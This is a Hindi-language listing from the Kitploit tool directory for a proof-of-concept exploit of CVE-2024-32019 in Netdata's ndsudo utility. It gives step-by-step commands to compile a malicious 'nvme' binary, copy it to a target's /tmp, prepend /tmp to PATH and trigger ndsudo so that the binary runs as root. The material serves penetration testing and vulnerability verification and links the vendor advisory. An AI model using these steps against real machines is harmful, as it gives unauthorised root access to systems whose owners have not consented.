Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32019-POC — netdata ndsudo कमजोरी के लिए POC - CVE-2024-32019 | Kitploit
उपकरण/GitHubGitHub/azureadtrent/cve-2024-32019-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

netdata ndsudo कमजोरी के लिए POC - CVE-2024-32019

रिपॉजिटरी देखें
2121 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ndsudo के माध्यम से विशेषाधिकार वृद्धि (Netdata स्थानीय शोषण)

यह POC Netdata के साथ बंडल की गई एक कमजोर ndsudo उपयोगिता का शोषण करके स्थानीय विशेषाधिकारों को रूट तक बढ़ाने के लिए उपयोग किया जाता है। यह शोषण उपयोगकर्ता के PATH में एक दुर्भावनापूर्ण बाइनरी इंजेक्ट करके काम करता है जो एक विश्वसनीय कमांड (nvme) का रूप धारण करता है और ndsudo द्वारा रूट विशेषाधिकारों के साथ निष्पादित किया जाता है।


पूर्वापेक्षाएँ और धारणाएँ

  • आपके पास लक्ष्य प्रणाली पर स्थानीय शेल पहुँच है।

  • आप निम्न कमांड निष्पादित कर सकते हैं लेकिन यह "not found" या समान त्रुटि के साथ विफल होता है:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. दुर्भावनापूर्ण पेलोड संकलित करें

अपनी हमलावर मशीन (या कमजोर सिस्टम यदि उसमें कंपाइलर है) पर, बाइनरी को संकलित करें (उदाहरण के लिए, रिपॉजिटरी में फ़ाइल poc.c से):

root@kitploit:~
gcc poc.c -o nvme

यह बाइनरी रूट शेल उत्पन्न करने या रूट विशेषाधिकारों के साथ मनमाना कमांड निष्पादित करने के लिए तैयार की जानी चाहिए।


2. पेलोड को लक्ष्य प्रणाली में स्थानांतरित करें

संकलित nvme बाइनरी को अपने उपयोगकर्ता द्वारा लिखने योग्य निर्देशिका में ले जाएँ या अपलोड करें, जैसे /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# या कोई भी फ़ाइल अपलोड विधि जो आपके पास है

3. पेलोड को निष्पादन के लिए तैयार करें

लक्ष्य प्रणाली पर, सुनिश्चित करें कि बाइनरी निष्पादन योग्य है और अपने PATH में उसकी निर्देशिका को प्रस्तुत करें:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

यह सुनिश्चित करता है कि ndsudo वैध के बजाय आपके दुर्भावनापूर्ण nvme को हल और निष्पादित करेगा।


4. अपने पेलोड को निष्पादित करने के लिए ndsudo ट्रिगर करें

ndsudo को ट्रिगर करने के लिए कमजोर कमांड चलाएँ:

root@kitploit:~
./ndsudo nvme-list

संसाधन

  • Netdata Github सलाह: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
टूल डाउनलोड करें